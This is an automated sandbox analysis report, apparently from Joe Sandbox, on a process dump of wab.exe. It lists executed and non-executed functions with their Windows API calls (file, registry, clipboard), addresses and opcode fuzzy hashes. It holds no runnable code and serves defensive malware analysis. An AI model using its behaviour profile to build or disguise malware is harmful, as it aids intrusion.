                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                          Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                          Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                          • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                          Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                          Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                          Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: EnumNamesResource
                                          • String ID:
                                          • API String ID: 3334572018-0
                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                          Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                          Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                          Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                          Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                          Function 00415304 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                          • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                          • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                          • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                          Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                          • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                          Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004095FC
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                            • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                          • String ID:
                                          • API String ID: 3655998216-0
                                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                          Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00445426
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                          • String ID:
                                          • API String ID: 1828521557-0
                                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                          Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                          • memcpy.MSVCRT ref: 00406942
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@FilePointermemcpy
                                          • String ID:
                                          • API String ID: 609303285-0
                                          • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                          • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                          Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _wcsicmp
                                          • String ID:
                                          • API String ID: 2081463915-0
                                          • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                          • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                          Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateErrorHandleLastRead
                                          • String ID:
                                          • API String ID: 2136311172-0
                                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                          Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@??3@
                                          • String ID:
                                          • API String ID: 1936579350-0
                                          • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                          • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8

                                          Non-executed Functions

                                          Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • EmptyClipboard.USER32 ref: 004098EC
                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                          • GlobalFix.KERNEL32(00000000), ref: 00409927
                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                          • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                          • GetLastError.KERNEL32 ref: 0040995D
                                          • CloseHandle.KERNEL32(?), ref: 00409969
                                          • GetLastError.KERNEL32 ref: 00409974
                                          • CloseClipboard.USER32 ref: 0040997D
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                          • String ID:
                                          • API String ID: 2565263379-0
                                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                          Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Library$AddressFreeLoadMessageProc
                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                          • API String ID: 2780580303-317687271
                                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                          Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • EmptyClipboard.USER32 ref: 00409882
                                          • wcslen.MSVCRT ref: 0040988F
                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                          • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                          • memcpy.MSVCRT ref: 004098B5
                                          • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                          • CloseClipboard.USER32 ref: 004098D7
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                          • String ID:
                                          • API String ID: 2014503067-0
                                          • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                          • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                          Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32 ref: 004182D7
                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                          • LocalFree.KERNEL32(?), ref: 00418342
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76F8DF80,?,0041755F,?), ref: 00417452
                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                          • String ID: OsError 0x%x (%u)
                                          • API String ID: 403622227-2664311388
                                          • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                          • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                          Function 0041183A Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                          • OpenClipboard.USER32(?), ref: 00411878
                                          • GetLastError.KERNEL32 ref: 0041188D
                                          • DeleteFileW.KERNEL32(?), ref: 004118AC
                                            • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                            • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                            • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                            • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                                            • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                            • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                            • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                            • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                            • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                                          • String ID:
                                          • API String ID: 1203541146-0
                                          • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                          • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                          • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                          • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                          Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 004173BE
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Version
                                          • String ID:
                                          • API String ID: 1889659487-0
